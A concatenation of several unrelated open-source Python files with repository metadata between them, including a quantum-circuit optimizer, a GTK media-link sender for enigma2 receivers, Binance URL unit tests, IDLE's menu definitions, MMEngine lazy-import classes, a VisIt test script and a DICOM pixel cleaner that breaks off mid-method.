new_dict = {}
for idx, _l in self._l.items():
if len(_l) > 0:
new_dict[idx] = _l
self._l = new_dict
def _cache_cmd(self, cmd):
"""Cache a command, i.e., inserts it into the command lists of all qubits involved."""
# are there qubit ids that haven't been added to the list?
idlist = [qubit.id for sublist in cmd.all_qubits for qubit in sublist]
# add gate command to each of the qubits involved
for qubit_id in idlist:
if qubit_id not in self._l:
self._l[qubit_id] = []
self._l[qubit_id] += [cmd]
self._check_and_send()
def receive(self, command_list):
"""
Receive a list of commands.
Receive commands from the previous engine and cache them. If a flush gate arrives, the entire buffer is sent
on.
"""
for cmd in command_list:
if cmd.gate == FlushGate(): # flush gate --> optimize and flush
# NB: self.optimize(i) modifies self._l
for idx in self._l: # pylint: disable=consider-using-dict-items
self._optimize(idx)
self._send_qubit_pipeline(idx, len(self._l[idx]))
new_dict = {}
for idx, _l in self._l.items():
if len(_l) > 0: # pragma: no cover
new_dict[idx] = _l
self._l = new_dict
if self._l: # pragma: no cover
raise RuntimeError('Internal compiler error: qubits remaining in LocalOptimizer after a flush!')
self.send([cmd])
else:
self._cache_cmd(cmd)
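# --- Illustrative usage, not part of the original module ---
# Hedged sketch of wiring the optimizer into a ProjectQ engine chain, so that
# two consecutive rotations reach the backend as a single merged gate:
# from projectq import MainEngine
# from projectq.ops import Rx
# eng = MainEngine(engine_list=[LocalOptimizer(cache_size=10)])
# qubit = eng.allocate_qubit()
# Rx(0.1) | qubit
# Rx(0.2) | qubit
# eng.flush()  # the optimizer merges the rotations before sending them on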
|
698b47661f82e04c3d5b65bda27d7636ec3fe061
|
6fe86ea636a69fff9174df6407839f0164407bdb
|
/tt/cross/oldcross/cross.py
|
65bf062a06724aae9866ddb28181951872f109e0
|
[
"MIT"
] |
permissive
|
oseledets/ttpy
|
9104e8014a73667b1cfc4fd867593cd8a6097ba0
|
a50d5e0ce2a033a4b1aa703715cb85d715b9b34a
|
refs/heads/master
| 2023-03-06T12:44:43.804115
| 2022-12-14T23:37:57
| 2022-12-14T23:37:57
| 5,499,019
| 220
| 77
|
MIT
| 2022-12-14T23:37:58
| 2012-08-21T18:22:27
|
Python
|
UTF-8
|
Python
| false
| false
| 304
|
py
|
cross.py
|
import numpy as np
import tt
""" This module is an implementation of the cross method for tensors """
""" What we do, we gradually apply 2d methods, and we basically need to recompute
UU^{-1} and VV^{-1} each time; the problem is then to go to next step in a sweep"""
def cross(n, f):
pass
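# --- Illustrative sketch, not part of the original stub ---
# A minimal 2d cross-approximation step of the kind the docstring alludes to:
# repeatedly pick the largest-residual pivot and subtract the rank-1 cross
# through it. This is a generic full-pivoting sketch, not the TT-cross
# algorithm this module was meant to implement.
def cross_2d_sketch(a, rank):
    """Greedy rank-`rank` cross approximation of a dense matrix `a`."""
    residual = np.array(a, dtype=float)
    approx = np.zeros_like(residual)
    for _ in range(rank):
        i, j = np.unravel_index(np.argmax(np.abs(residual)), residual.shape)
        pivot = residual[i, j]
        if pivot == 0:
            break  # the matrix is already reproduced exactly
        update = np.outer(residual[:, j], residual[i, :]) / pivot
        approx += update
        residual -= update
    return approx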
|
93e5e5101eea670a54eb5f2a366ce45e21029876
|
9677df3908029dcc4abdbe1f88190fc1d71dce7d
|
/app/ui/transmitter.py
|
726a311b3ed7dcc3c04d4f86f051fb4772236e60
|
[
"MIT",
"GPL-3.0-only",
"GPL-1.0-or-later",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
DYefremov/DemonEditor
|
b6e467fe8191badca3ae81ceaeeed745952aca4c
|
917e184486ff212b4a19b36ab726343f900da8b7
|
refs/heads/master
| 2023-08-06T05:37:32.674377
| 2023-07-25T13:44:31
| 2023-07-25T13:44:31
| 106,046,839
| 105
| 331
|
MIT
| 2023-06-10T16:08:08
| 2017-10-06T20:19:57
|
Python
|
UTF-8
|
Python
| false
| false
| 6,992
|
py
|
transmitter.py
|
from pathlib import Path
from urllib.parse import urlparse
import gi
from gi.repository import GLib
from app.commons import log
from app.connections import HttpAPI
from app.tools.yt import YouTube
from app.ui.dialogs import get_builder
from app.ui.iptv import get_yt_icon
from .uicommons import Gtk, Gdk, UI_RESOURCES_PATH
class LinksTransmitter:
""" The main class for the "send to" function.
    It is used for direct playback of media links by the enigma2 media player.
"""
__STREAM_PREFIX = "4097:0:1:0:0:0:0:0:0:0:"
def __init__(self, http_api, app_window, settings):
handlers = {"on_popup_menu": self.on_popup_menu,
"on_status_icon_activate": self.on_status_icon_activate,
"on_url_changed": self.on_url_changed,
"on_url_activate": self.on_url_activate,
"on_drag_data_received": self.on_drag_data_received,
"on_previous": self.on_previous,
"on_next": self.on_next,
"on_stop": self.on_stop,
"on_clear": self.on_clear,
"on_play": self.on_play}
self._http_api = http_api
self._app_window = app_window
self._is_status_icon = True
builder = get_builder(UI_RESOURCES_PATH + "transmitter.glade", handlers)
self._main_window = builder.get_object("main_window")
self._url_entry = builder.get_object("url_entry")
self._tool_bar = builder.get_object("tool_bar")
self._popup_menu = builder.get_object("staus_popup_menu")
self._restore_menu_item = builder.get_object("restore_menu_item")
self._status_active = None
self._status_passive = None
self._yt = YouTube.get_instance(settings)
try:
gi.require_version("AppIndicator3", "0.1")
from gi.repository import AppIndicator3
except (ImportError, ValueError) as e:
log("{}: Load library error: {}".format(__class__.__name__, e))
self._tray = builder.get_object("status_icon")
else:
self._is_status_icon = False
self._status_active = AppIndicator3.IndicatorStatus.ACTIVE
self._status_passive = AppIndicator3.IndicatorStatus.PASSIVE
category = AppIndicator3.IndicatorCategory.APPLICATION_STATUS
path = Path(UI_RESOURCES_PATH + "/icons/hicolor/scalable/apps/demon-editor.svg")
path = str(path.resolve()) if path.is_file() else "demon-editor"
self._tray = AppIndicator3.Indicator.new("DemonEditor", path, category)
self._tray.set_status(self._status_active)
self._tray.set_secondary_activate_target(builder.get_object("show_menu_item"))
self._tray.set_menu(self._popup_menu)
style_provider = Gtk.CssProvider()
style_provider.load_from_path(UI_RESOURCES_PATH + "style.css")
self._url_entry.get_style_context().add_provider_for_screen(Gdk.Screen.get_default(), style_provider,
Gtk.STYLE_PROVIDER_PRIORITY_USER)
def show(self, show):
if self._is_status_icon:
self._tray.set_visible(show)
elif self._status_active:
self._tray.set_status(self._status_active if show else self._status_passive)
if not show:
self.hide()
def hide(self):
self._main_window.hide()
def on_popup_menu(self, menu, button, time):
menu.popup(None, None, None, None, button, time)
def on_status_icon_activate(self, window):
visible = window.get_visible()
window.hide() if visible else window.show()
self._app_window.present() if visible else self._app_window.iconify()
def on_url_changed(self, entry):
entry.set_name("GtkEntry" if self.is_url(entry.get_text()) else "digit-entry")
def on_url_activate(self, entry):
gen = self.activate_url(entry.get_text())
GLib.idle_add(lambda: next(gen, False), priority=GLib.PRIORITY_LOW)
def on_drag_data_received(self, entry, drag_context, x, y, data, info, time):
url = data.get_text()
GLib.idle_add(entry.set_text, url)
gen = self.activate_url(url)
GLib.idle_add(lambda: next(gen, False), priority=GLib.PRIORITY_LOW)
def activate_url(self, url):
self._url_entry.set_name("GtkEntry")
self._url_entry.set_icon_from_stock(Gtk.EntryIconPosition.SECONDARY, None)
if self.is_url(url):
self._tool_bar.set_sensitive(False)
yt_id = YouTube.get_yt_id(url)
yield True
if yt_id:
self._url_entry.set_icon_from_pixbuf(Gtk.EntryIconPosition.SECONDARY, get_yt_icon("youtube", 32))
links, title = self._yt.get_yt_link(yt_id, url)
yield True
if links:
url = links[sorted(links, key=lambda x: int(x.rstrip("p")), reverse=True)[0]]
else:
self.on_done(links)
return
else:
self._url_entry.set_icon_from_stock(Gtk.EntryIconPosition.SECONDARY, None)
self._http_api.send(HttpAPI.Request.PLAY, url, self.on_done, self.__STREAM_PREFIX)
yield True
def on_done(self, res):
""" Play callback """
res = res.get("e2state", None) if res else res
self._url_entry.set_name("GtkEntry" if res else "digit-entry")
GLib.idle_add(self._tool_bar.set_sensitive, True)
def on_previous(self, item):
self._http_api.send(HttpAPI.Request.PLAYER_PREV, None, self.on_done)
def on_next(self, item):
self._http_api.send(HttpAPI.Request.PLAYER_NEXT, None, self.on_done)
def on_play(self, item):
self._http_api.send(HttpAPI.Request.PLAYER_PLAY, None, self.on_done)
def on_stop(self, item):
self._http_api.send(HttpAPI.Request.PLAYER_STOP, None, self.on_done)
def on_clear(self, item):
""" Remove added links in the playlist. """
GLib.idle_add(self._tool_bar.set_sensitive, False)
self._http_api.send(HttpAPI.Request.PLAYER_LIST, None, self.clear_playlist)
def clear_playlist(self, res):
GLib.idle_add(self._tool_bar.set_sensitive, not res)
if "error_code" in res:
log("Error clearing playlist. There may be no http connection.")
self.on_done(res)
return
for ref in res:
GLib.idle_add(self._tool_bar.set_sensitive, False)
self._http_api.send(HttpAPI.Request.PLAYER_REMOVE,
ref.get("e2servicereference", ""),
self.on_done,
self.__STREAM_PREFIX)
@staticmethod
def is_url(text):
""" Simple url checking. """
result = urlparse(text)
return result.scheme and result.netloc
if __name__ == "__main__":
pass
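# --- Illustrative note, not part of the original module ---
# is_url() only checks that a scheme and a network location parse out:
# LinksTransmitter.is_url("http://127.0.0.1/stream.m3u8") -> truthy
# LinksTransmitter.is_url("not a url") -> falsy (empty scheme and netloc)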
|
ac3e5e4de01351712c876b1b2640cae5296be869
|
e3bb1df7fa4c51900dec7e9ddf5295e1a80938bd
|
/test/hummingbot/connector/exchange/binance/test_binance_web_utils.py
|
bf7f1d14fd8adbed3cf841350eb294961b1fa9c9
|
[
"Apache-2.0"
] |
permissive
|
CoinAlpha/hummingbot
|
0d1e2bd94de1280748647108c7d7800a09546eb8
|
c3f101759ab7e7a2165cd23a3a3e94c90c642a9b
|
refs/heads/development
| 2023-09-01T11:24:43.322137
| 2023-08-31T03:08:06
| 2023-08-31T03:08:06
| 439,330,952
| 135
| 98
|
Apache-2.0
| 2023-08-30T13:55:08
| 2021-12-17T12:50:42
|
Python
|
UTF-8
|
Python
| false
| false
| 776
|
py
|
test_binance_web_utils.py
|
import unittest
import hummingbot.connector.exchange.binance.binance_constants as CONSTANTS
from hummingbot.connector.exchange.binance import binance_web_utils as web_utils
class BinanceUtilTestCases(unittest.TestCase):
def test_public_rest_url(self):
path_url = "/TEST_PATH"
domain = "com"
expected_url = CONSTANTS.REST_URL.format(domain) + CONSTANTS.PUBLIC_API_VERSION + path_url
self.assertEqual(expected_url, web_utils.public_rest_url(path_url, domain))
def test_private_rest_url(self):
path_url = "/TEST_PATH"
domain = "com"
expected_url = CONSTANTS.REST_URL.format(domain) + CONSTANTS.PRIVATE_API_VERSION + path_url
self.assertEqual(expected_url, web_utils.private_rest_url(path_url, domain))
|
dbc7417a8c72a015a52381427c6d5bc5ea4b819d
|
fdbb74a95924e2677466614f6ab6e2bb13b2a95a
|
/third_party/python/Lib/idlelib/mainmenu.py
|
9fe6b5229446e3072744db46de8a3001f6adff47
|
[
"ISC",
"Python-2.0",
"GPL-1.0-or-later",
"LicenseRef-scancode-python-cwi",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-other-copyleft"
] |
permissive
|
jart/cosmopolitan
|
fb11b5658939023977060a7c6c71a74093d9cb44
|
0d748ad58e1063dd1f8560f18a0c75293b9415b7
|
refs/heads/master
| 2023-09-06T09:17:29.303607
| 2023-09-02T03:49:13
| 2023-09-02T03:50:18
| 272,457,606
| 11,887
| 435
|
ISC
| 2023-09-14T17:47:58
| 2020-06-15T14:16:13
|
C
|
UTF-8
|
Python
| false
| false
| 3,703
|
py
|
mainmenu.py
|
"""Define the menu contents, hotkeys, and event bindings.
There is additional configuration information in the EditorWindow class (and
subclasses): the menus are created there based on the menu_specs (class)
variable, and menus not created are silently skipped in the code here. This
makes it possible, for example, to define a Debug menu which is only present in
the PythonShell window, and a Format menu which is only present in the Editor
windows.
"""
from importlib.util import find_spec
from idlelib.config import idleConf
# Warning: menudefs is altered in macosx.overrideRootMenu()
# after it is determined that an OS X Aqua Tk is in use,
# which cannot be done until after Tk() is first called.
# Do not alter the 'file', 'options', or 'help' cascades here
# without altering overrideRootMenu() as well.
# TODO: Make this more robust
menudefs = [
    # An underscore in a label prefixes the character to underline (the keyboard accelerator)
('file', [
('_New File', '<<open-new-window>>'),
('_Open...', '<<open-window-from-file>>'),
('Open _Module...', '<<open-module>>'),
('Module _Browser', '<<open-class-browser>>'),
('_Path Browser', '<<open-path-browser>>'),
None,
('_Save', '<<save-window>>'),
('Save _As...', '<<save-window-as-file>>'),
('Save Cop_y As...', '<<save-copy-of-window-as-file>>'),
None,
('Prin_t Window', '<<print-window>>'),
None,
('_Close', '<<close-window>>'),
('E_xit', '<<close-all-windows>>'),
]),
('edit', [
('_Undo', '<<undo>>'),
('_Redo', '<<redo>>'),
None,
('Cu_t', '<<cut>>'),
('_Copy', '<<copy>>'),
('_Paste', '<<paste>>'),
('Select _All', '<<select-all>>'),
None,
('_Find...', '<<find>>'),
('Find A_gain', '<<find-again>>'),
('Find _Selection', '<<find-selection>>'),
('Find in Files...', '<<find-in-files>>'),
('R_eplace...', '<<replace>>'),
('Go to _Line', '<<goto-line>>'),
('S_how Completions', '<<force-open-completions>>'),
('E_xpand Word', '<<expand-word>>'),
('Show C_all Tip', '<<force-open-calltip>>'),
('Show Surrounding P_arens', '<<flash-paren>>'),
]),
('format', [
('_Indent Region', '<<indent-region>>'),
('_Dedent Region', '<<dedent-region>>'),
('Comment _Out Region', '<<comment-region>>'),
('U_ncomment Region', '<<uncomment-region>>'),
('Tabify Region', '<<tabify-region>>'),
('Untabify Region', '<<untabify-region>>'),
('Toggle Tabs', '<<toggle-tabs>>'),
('New Indent Width', '<<change-indentwidth>>'),
('F_ormat Paragraph', '<<format-paragraph>>'),
('S_trip Trailing Whitespace', '<<do-rstrip>>'),
]),
('run', [
('Python Shell', '<<open-python-shell>>'),
('C_heck Module', '<<check-module>>'),
('R_un Module', '<<run-module>>'),
]),
('shell', [
('_View Last Restart', '<<view-restart>>'),
('_Restart Shell', '<<restart-shell>>'),
None,
('_Interrupt Execution', '<<interrupt-execution>>'),
]),
('debug', [
('_Go to File/Line', '<<goto-file-line>>'),
('!_Debugger', '<<toggle-debugger>>'),
('_Stack Viewer', '<<open-stack-viewer>>'),
('!_Auto-open Stack Viewer', '<<toggle-jit-stack-viewer>>'),
]),
('options', [
('Configure _IDLE', '<<open-config-dialog>>'),
('_Code Context', '<<toggle-code-context>>'),
]),
('window', [
('Zoom Height', '<<zoom-height>>'),
]),
('help', [
('_About IDLE', '<<about-idle>>'),
None,
('_IDLE Help', '<<help>>'),
('Python _Docs', '<<python-docs>>'),
]),
]
if find_spec('turtledemo'):
menudefs[-1][1].append(('Turtle Demo', '<<open-turtle-demo>>'))
default_keydefs = idleConf.GetCurrentKeySet()
if __name__ == '__main__':
from unittest import main
main('idlelib.idle_test.test_mainmenu', verbosity=2)
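# --- Illustrative note, not part of the original module ---
# Each menudefs entry is (menu_name, [(label, virtual_event) or None, ...]).
# For example, ('_New File', '<<open-new-window>>') renders as "New File"
# with the "N" underlined, and selecting it fires the <<open-new-window>>
# virtual event on the window; None entries become menu separators.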
|
7fda73abc5ac7244025aba4b341e99956d07d864
|
f729993e43a8f2031a4ad5c766e63117588b4312
|
/mmengine/config/lazy.py
|
e83cce7c89cbd919def774addaaac8186c10e989
|
[
"Apache-2.0"
] |
permissive
|
open-mmlab/mmengine
|
d28a41c4b3dac47c58ee19b241c4b963eb14ddb6
|
170758aefe6cb05f61bf9353d03af1b8c1f4f73a
|
refs/heads/main
| 2023-08-29T18:12:33.261889
| 2023-08-28T08:15:00
| 2023-08-28T08:15:00
| 456,857,425
| 708
| 279
|
Apache-2.0
| 2023-09-14T09:23:21
| 2022-02-08T09:05:09
|
Python
|
UTF-8
|
Python
| false
| false
| 8,731
|
py
|
lazy.py
|
# Copyright (c) OpenMMLab. All rights reserved.
import importlib
from typing import Any, Optional, Union
from mmengine.utils import is_seq_of
class LazyObject:
"""LazyObject is used to lazily initialize the imported module during
parsing the configuration file.
During parsing process, the syntax like:
Examples:
>>> import torch.nn as nn
>>> from mmdet.models import RetinaNet
>>> import mmcls.models
>>> import mmcls.datasets
>>> import mmcls
Will be parsed as:
Examples:
>>> # import torch.nn as nn
        >>> nn = LazyObject('torch.nn')
        >>> # from mmdet.models import RetinaNet
        >>> RetinaNet = LazyObject('mmdet.models', 'RetinaNet')
        >>> # import mmcls.models; import mmcls.datasets; import mmcls
        >>> mmcls = LazyObject(['mmcls', 'mmcls.datasets', 'mmcls.models'])
``LazyObject`` records all module information and will be further
referenced by the configuration file.
Args:
module (str or list or tuple): The module name to be imported.
imported (str, optional): The imported module name. Defaults to None.
location (str, optional): The filename and line number of the imported
module statement happened.
"""
def __init__(self,
module: Union[str, list, tuple],
imported: Optional[str] = None,
location: Optional[str] = None):
if not isinstance(module, str) and not is_seq_of(module, str):
            raise TypeError('module should be `str`, `list`, or `tuple` '
f'but got {type(module)}, this might be '
'a bug of MMEngine, please report it to '
'https://github.com/open-mmlab/mmengine/issues')
self._module: Union[str, list, tuple] = module
if not isinstance(imported, str) and imported is not None:
raise TypeError('imported should be `str` or None, but got '
f'{type(imported)}, this might be '
'a bug of MMEngine, please report it to '
'https://github.com/open-mmlab/mmengine/issues')
self._imported = imported
self.location = location
def build(self) -> Any:
"""Return imported object.
Returns:
Any: Imported object
"""
if isinstance(self._module, str):
try:
module = importlib.import_module(self._module)
except Exception as e:
raise type(e)(f'Failed to import {self._module} '
f'in {self.location} for {e}')
if self._imported is not None:
if hasattr(module, self._imported):
module = getattr(module, self._imported)
else:
raise ImportError(
f'Failed to import {self._imported} '
f'from {self._module} in {self.location}')
return module
else:
# import xxx.xxx
# import xxx.yyy
# import xxx.zzz
# return imported xxx
try:
for module in self._module:
importlib.import_module(module) # type: ignore
module_name = self._module[0].split('.')[0]
return importlib.import_module(module_name)
except Exception as e:
raise type(e)(f'Failed to import {self.module} '
f'in {self.location} for {e}')
@property
def module(self):
if isinstance(self._module, str):
return self._module
return self._module[0].split('.')[0]
def __call__(self, *args, **kwargs):
raise RuntimeError()
def __deepcopy__(self, memo):
return LazyObject(self._module, self._imported, self.location)
def __getattr__(self, name):
# Cannot locate the line number of the getting attribute.
# Therefore only record the filename.
if self.location is not None:
location = self.location.split(', line')[0]
else:
location = self.location
return LazyAttr(name, self, location)
def __str__(self) -> str:
if self._imported is not None:
return self._imported
return self.module
__repr__ = __str__
# `pickle.dump` will try to get the `__getstate__` and `__setstate__`
# methods of the dumped object. If these two methods are not defined,
    # `__getattr__` would return a LazyAttr named `__getstate__` or
    # `__setstate__` instead, which would break pickling.
def __getstate__(self):
return self.__dict__
def __setstate__(self, state):
self.__dict__ = state
class LazyAttr:
"""The attribute of the LazyObject.
When parsing the configuration file, the imported syntax will be
parsed as the assignment ``LazyObject``. During the subsequent parsing
process, users may reference the attributes of the LazyObject.
To ensure that these attributes also contain information needed to
reconstruct the attribute itself, LazyAttr was introduced.
Examples:
>>> models = LazyObject(['mmdet.models'])
>>> model = dict(type=models.RetinaNet)
>>> print(type(model['type'])) # <class 'mmengine.config.lazy.LazyAttr'>
>>> print(model['type'].build()) # <class 'mmdet.models.detectors.retinanet.RetinaNet'>
""" # noqa: E501
def __init__(self,
name: str,
source: Union['LazyObject', 'LazyAttr'],
location=None):
self.name = name
self.source: Union[LazyAttr, LazyObject] = source
if isinstance(self.source, LazyObject):
if isinstance(self.source._module, str):
                if self.source._imported is None:
                    # source code:
                    # import xxx.yyy as zzz
                    # equivalent code:
                    # zzz = LazyObject('xxx.yyy')
                    # The source code of get attribute:
                    # eee = zzz.eee
                    # Then, `eee._module` should be "xxx.yyy"
                    self._module = self.source._module
                else:
                    # source code:
                    # from xxx.yyy import zzz
                    # equivalent code:
                    # zzz = LazyObject('xxx.yyy', 'zzz')
                    # The source code of get attribute:
                    # eee = zzz.eee
                    # Then, `eee._module` should be "xxx.yyy.zzz"
                    self._module = f'{self.source._module}.{self.source}'
else:
# The source code of LazyObject should be
# 1. import xxx.yyy
# 2. import xxx.zzz
# Equivalent to
# xxx = LazyObject(['xxx.yyy', 'xxx.zzz'])
# The source code of LazyAttr should be
# eee = xxx.eee
# Then, eee._module = xxx
self._module = str(self.source)
elif isinstance(self.source, LazyAttr):
# 1. import xxx
# 2. zzz = xxx.yyy.zzz
# Equivalent to:
# xxx = LazyObject('xxx')
# zzz = xxx.yyy.zzz
# zzz._module = xxx.yyy._module + zzz.name
self._module = f'{self.source._module}.{self.source.name}'
self.location = location
@property
def module(self):
return self._module
def __call__(self, *args, **kwargs: Any) -> Any:
raise RuntimeError()
def __getattr__(self, name: str) -> 'LazyAttr':
return LazyAttr(name, self)
def __deepcopy__(self, memo):
return LazyAttr(self.name, self.source)
def build(self) -> Any:
"""Return the attribute of the imported object.
Returns:
Any: attribute of the imported object.
"""
obj = self.source.build()
try:
return getattr(obj, self.name)
except AttributeError:
raise ImportError(f'Failed to import {self.module}.{self.name} in '
f'{self.location}')
except ImportError as e:
raise e
def __str__(self) -> str:
return self.name
__repr__ = __str__
    # `pickle.dump` will try to get the `__getstate__` and `__setstate__`
    # methods of the dumped object. If these two methods are not defined,
    # `__getattr__` would return a `__getstate__` or `__setstate__` LazyAttr
    # placeholder instead of the real state.
def __getstate__(self):
return self.__dict__
def __setstate__(self, state):
self.__dict__ = state
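# A minimal usage sketch (illustrative, not part of the module): it assumes
# LazyObject.build(), defined earlier in this file, performs the deferred
# import via importlib. The module names below are placeholders.
#
#   np = LazyObject('numpy')        # stands in for `import numpy as np`
#   attr = np.linalg                # LazyAttr('linalg', np); nothing imported yet
#   nested = attr.norm              # LazyAttr('norm', attr)
#   real_fn = nested.build()        # only now is numpy imported -> numpy.linalg.norm
#
# Calling np(...) or attr(...) directly raises RuntimeError, since lazy
# objects are placeholders rather than the real callables.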
|
462b8774fcacee71420781c2224134f45cfae488
|
03666e5f961946fc1a0ac67781ac1425562ef0d7
|
/src/test/tests/databases/blueprint_axom_klee.py
|
d50dc63ab57c0da565dc313a449615e08433cf33
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
visit-dav/visit
|
e9f81b4d4b9b9930a0db9d5282cd1bcabf465e2e
|
601ae46e0bef2e18425b482a755d03490ade0493
|
refs/heads/develop
| 2023-09-06T08:19:38.397058
| 2023-09-05T21:29:32
| 2023-09-05T21:29:32
| 165,565,988
| 335
| 120
|
BSD-3-Clause
| 2023-09-14T00:53:37
| 2019-01-13T23:27:26
|
C
|
UTF-8
|
Python
| false
| false
| 4,261
|
py
|
blueprint_axom_klee.py
|
# ----------------------------------------------------------------------------
# CLASSES: nightly
#
# Test Case: blueprint_axom_klee.py
#
# Tests: blueprint hdf5 files
#
# Programmer: Brad Whitlock
# Date: Wed May 31 15:59:22 PDT 2023
#
# Modifications:
#
# ----------------------------------------------------------------------------
RequiredDatabasePlugin("Blueprint")
from os.path import join as pjoin
def bj_test_helper(datadir, prefix, sectionText):
TestSection(sectionText)
db = data_path(pjoin("axom_klee_test_data", datadir, "shaping.root"))
OpenDatabase(db)
AddPlot("FilledBoundary", "shaping_mesh_material")
fb = FilledBoundaryAttributes(1)
fb.SetMultiColor(0, (255,0,0,255))
fb.SetMultiColor(1, (0,255,0,255))
fb.SetMultiColor(2, (0,0,255,255))
fb.SetMultiColor(3, (0,255,255,255))
SetPlotOptions(fb)
AddPlot("Mesh", "shaping_mesh")
DrawPlots()
v = GetView2D()
v.windowCoords = (7.83773, 12.304, 8.64959, 13.1412)
v.viewportCoords = (0.2, 0.95, 0.15, 0.95)
SetView2D(v)
SetActivePlots((0,1))
Test(prefix + "_00")
# Increase the resolution.
AddOperator("MultiresControl", 1)
m = MultiresControlAttributes()
m.resolution = 4
m.maxResolution = 10
SetOperatorOptions(m)
DrawPlots()
Test(prefix + "_01")
v2 = GetView2D()
v2.windowCoords = (9.50025, 10.5163, 10.8769, 11.9097)
v2.viewportCoords = (0.2, 0.95, 0.15, 0.95)
SetView2D(v2)
Test(prefix + "_02")
# Look at one of the volume fractions. It should be refined
SetActivePlots(0)
DeleteActivePlots()
AddPlot("Pseudocolor", "shaping_mesh/vol_frac_steel", 1, 1)
DrawPlots()
SetView2D(v)
Test(prefix + "_03")
DeleteAllPlots()
CloseDatabase(db)
def test0():
TestSection("P0 Material")
db = data_path(pjoin("axom_klee_test_data", "heroic_roses_o0", "shaping.root"))
OpenDatabase(db)
AddPlot("FilledBoundary", "shaping_mesh_material")
fb = FilledBoundaryAttributes(1)
fb.SetMultiColor(0, (0,0,0,255))
fb.SetMultiColor(1, (80,80,220,255))
fb.SetMultiColor(2, (93,241,160,255))
fb.SetMultiColor(3, (0,120,0,255))
fb.SetMultiColor(4, (90,100,50,255))
fb.SetMultiColor(5, (241,132,171,255))
fb.SetMultiColor(6, (184,158,241,255))
fb.SetMultiColor(7, (240,0,0,255))
fb.SetMultiColor(8, (255,153,0,255))
SetPlotOptions(fb)
DrawPlots()
ResetView()
Test("blueprint_axom_klee_0_00")
DeleteAllPlots()
CloseDatabase(db)
def test1():
bj_test_helper("balls_and_jacks_q7o2", "blueprint_axom_klee_1", "P2 Material")
def test2():
bj_test_helper("balls_and_jacks_q7o5", "blueprint_axom_klee_2", "P5 Material")
def test3():
TestSection("matvf on HO materials")
db = data_path(pjoin("axom_klee_test_data", "3mat_q12o12", "shaping.root"))
OpenDatabase(db)
AddPlot("FilledBoundary", "shaping_mesh_material")
AddOperator("MultiresControl")
op = MultiresControlAttributes()
op.resolution = 16
SetOperatorOptions(op)
DrawPlots()
ResetView()
Test("blueprint_axom_klee_3_00")
DeleteAllPlots()
DefineScalarExpression("vf_inner", 'matvf(shaping_mesh_material, "inner")')
DefineScalarExpression("vf_middle", 'matvf(shaping_mesh_material, "middle")')
DefineScalarExpression("vf_outer", 'matvf(shaping_mesh_material, "outer")')
AddPlot("Pseudocolor", "vf_inner")
AddOperator("MultiresControl")
op = MultiresControlAttributes()
op.resolution = 3
op.maxResolution = 20
SetOperatorOptions(op)
DrawPlots()
Test("blueprint_axom_klee_3_01")
op.resolution = 20
SetOperatorOptions(op)
Test("blueprint_axom_klee_3_02")
ChangeActivePlotsVar("vf_middle")
op.resolution = 3
SetOperatorOptions(op)
Test("blueprint_axom_klee_3_03")
op.resolution = 20
SetOperatorOptions(op)
Test("blueprint_axom_klee_3_04")
ChangeActivePlotsVar("vf_outer")
op.resolution = 3
SetOperatorOptions(op)
Test("blueprint_axom_klee_3_05")
op.resolution = 20
SetOperatorOptions(op)
Test("blueprint_axom_klee_3_06")
DeleteAllPlots()
CloseDatabase(db)
def main():
test0()
test1()
test2()
test3()
main()
Exit()
|
2abba51d0c2adf91b5a5157aa6b8de48c443eb23
|
4b609f6c89b1e2c3ac43f0864f6b602396da9d22
|
/deid/dicom/pixels/clean.py
|
a65623793e0aeabcde6859ef1c2c698af94dea61
|
[
"MIT"
] |
permissive
|
pydicom/deid
|
e1a597ce95d25e12e35ec9623d904d6c57e49bb4
|
40dc96125daeb65856d643e12c3d6dfec756be0d
|
refs/heads/master
| 2023-07-02T08:29:14.299457
| 2023-05-10T17:01:11
| 2023-05-10T17:01:11
| 94,163,984
| 120
| 52
|
MIT
| 2023-09-11T22:32:00
| 2017-06-13T03:16:10
|
Python
|
UTF-8
|
Python
| false
| false
| 15,394
|
py
|
clean.py
|
__author__ = "Vanessa Sochat"
__copyright__ = "Copyright 2016-2023, Vanessa Sochat"
__license__ = "MIT"
import math
import os
import random
import re
import sys
from typing import Optional
import matplotlib
import numpy
from numpy.typing import NDArray
from pydicom import read_file
from pydicom.pixel_data_handlers.util import get_expected_length
from deid.config import DeidRecipe
from deid.dicom import utils
from deid.logger import bot
from deid.utils import get_temporary_name
matplotlib.use("pdf")
from matplotlib import pyplot as plt # noqa
bot.level = 3
class DicomCleaner:
"""
Clean a dicom file of burned pixels.
take an input dicom file, check for burned pixels, and then clean,
with option to save / output in multiple formats. This object should
map to one dicom file, and the usage flow is the following:
cleaner = DicomCleaner()
summary = cleaner.detect(dicom_file)
cleaner.clean()
"""
def __init__(
self,
output_folder=None,
add_padding=False,
margin=3,
deid=None,
font=None,
force=True,
):
if output_folder is None:
output_folder = get_temporary_name(prefix="clean")
if font is None:
font = self.default_font()
self.font = font
self.cmap = "gray"
self.output_folder = output_folder
self.recipe = DeidRecipe(deid)
self.results = None
self.force = force
self.dicom_file: Optional[str] = None
self.cleaned: Optional[NDArray] = None
def default_font(self):
"""
Get the default font to use for a title.
define the font style for saving png figures
if a title is provided
"""
return {"family": "serif", "color": "darkred", "weight": "normal", "size": 16}
def detect(self, dicom_file):
"""
Initiate the cleaner for a new dicom file.
"""
from deid.dicom.pixels.detect import has_burned_pixels
self.results = has_burned_pixels(
dicom_file, deid=self.recipe.deid, force=self.force
)
self.dicom_file = dicom_file
return self.results
def clean(
self, fix_interpretation: bool = True, pixel_data_attribute: str = "PixelData"
) -> Optional[NDArray]:
if not self.results:
bot.warning(
"Use %s.detect() with a dicom file to find coordinates first." % self
)
return
bot.info("Scrubbing %s." % self.dicom_file)
self.cleaned = clean_pixel_data(
dicom_file=self.dicom_file,
results=self.results,
fix_interpretation=fix_interpretation,
pixel_data_attribute=pixel_data_attribute,
)
return self.cleaned
def get_figure(self, show=False, image_type="cleaned", title=None):
"""
Get a figure for an original or cleaned image.
If the image was already clean, it is simply a copy of the original.
If show is True, plot the image. If a 4d image is discovered, we use
randomly choose a slice.
"""
if hasattr(self, image_type):
_, ax = plt.subplots(figsize=(10, 6))
# Retrieve full image
image = getattr(self, image_type)
# Handle 4d data by choosing one dimension
if len(image.shape) == 4:
channel = random.choice(range(image.shape[3]))
bot.warning(
"Image detected as 4d, will sample channel %s and middle slice"
% channel
)
image = image[math.floor(image.shape[0] / 2), :, :, channel]
ax.imshow(image, cmap=self.cmap)
if title is not None:
